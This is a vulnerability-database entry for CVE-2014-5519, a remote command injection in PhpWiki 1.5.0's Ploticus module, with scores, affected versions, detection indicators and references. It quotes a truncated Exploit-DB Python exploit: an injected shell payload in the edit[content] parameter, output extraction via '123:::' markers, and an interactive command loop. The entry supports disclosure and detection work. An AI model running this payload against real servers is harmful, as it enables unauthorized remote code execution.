CVE-2014-5519
Published 2014-09-11
Priority P267 (high). CVSS 2.0 base score 7.5, vector AV:N/AC:L/Au:N/C:P/I:P/A:P
Exploit: EPSS 64.97% (99.1th percentile)
The Ploticus module in PhpWiki 1.5.0 allows remote attackers to execute arbitrary code via shell metacharacters in a device option in the edit[content] parameter to index.php/HeIp. NOTE: some of these details are obtained from third party information.
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| phpwiki_project | phpwiki | — | — |
Detection & IOCs (extracted from sources)
Command pattern: edit[content]=-device svg -o /dev/stderr -csmap= data= alt= help= >> with shell metacharacters injected
- Monitor HTTP POST requests to index.php/HeIp containing shell metacharacters (e.g., semicolons, backticks, pipe characters) within the edit[content] parameter, specifically in the device option of the Ploticus plugin.
- Detect the canary/delimiter pattern '123:::' and ':::123' in HTTP responses, which the exploit uses to extract command output from stderr redirection.
- A Metasploit module exists for this vulnerability; correlate exploit attempts against PhpWiki 1.5.0 installations at the /index.php/HeIp path with known Metasploit user-agent strings.
- The target endpoint /index.php/HeIp is a specific wiki page name used in the exploit; the vulnerability may be triggerable via other wiki page names if the Ploticus plugin is enabled site-wide, not just on this page.
No detection rules found.
Exploit-DB
PhpWiki - Remote Command Execution (exploitdb, 2014-08-28)

Excerpt as indexed; the listing is cut off mid-file between the ASCII banner and the tail of the line that builds the edit[content] request body:

```python
###############################################################
# ____ __ _ __ _
# / __/_ ______ _ ____ / /_ ____ _ __(_) /__(_)
# / /_/ / / / __ `/ / __ \/ __ \/ __ \ | /| / / / //_/ /
# / __/ /_/ / /_/ / / /_/ / / / / /_/ / |/ |/ / / ,&2;'+cmd+' 1>&2;echo \':::\'123 1>&2;" -prefab= -csmap= data= alt= help= >>'),('edit[preview]','Preview'),('action','edit')])
    cmd1 = urllib2.Request(domain +'/index.php/HeIp',data)
    cmd2 = urllib2.urlopen(cmd1)
    output = cmd2.read()
    firstloc = output.find("123:::\n") + len("123:::\n")
    secondloc = output.find("\n:::123")
    return output[firstloc:secondloc]
banner()
print commandexec('uname -a')
print commandexec('id')
while(quit != 1):
    cmd = raw_input('Run a command: ')
    if cmd == 'quit':
        print "[-] Hope you had fun :)"
```
Metasploit
Phpwiki Ploticus Remote Code Execution (metasploit)
The Ploticus module in PhpWiki 1.5.0 allows remote attackers to execute arbitrary code via command injection.
No writeups or analysis indexed.
References
- http://osvdb.org/show/osvdb/110576
- http://packetstormsecurity.com/files/128031/PhpWiki-Ploticus-Command-Injection.html
- http://seclists.org/fulldisclosure/2014/Aug/77
- http://seclists.org/oss-sec/2014/q3/456
- http://seclists.org/oss-sec/2014/q3/465
- http://secunia.com/advisories/60293
- http://www.exploit-db.com/exploits/34451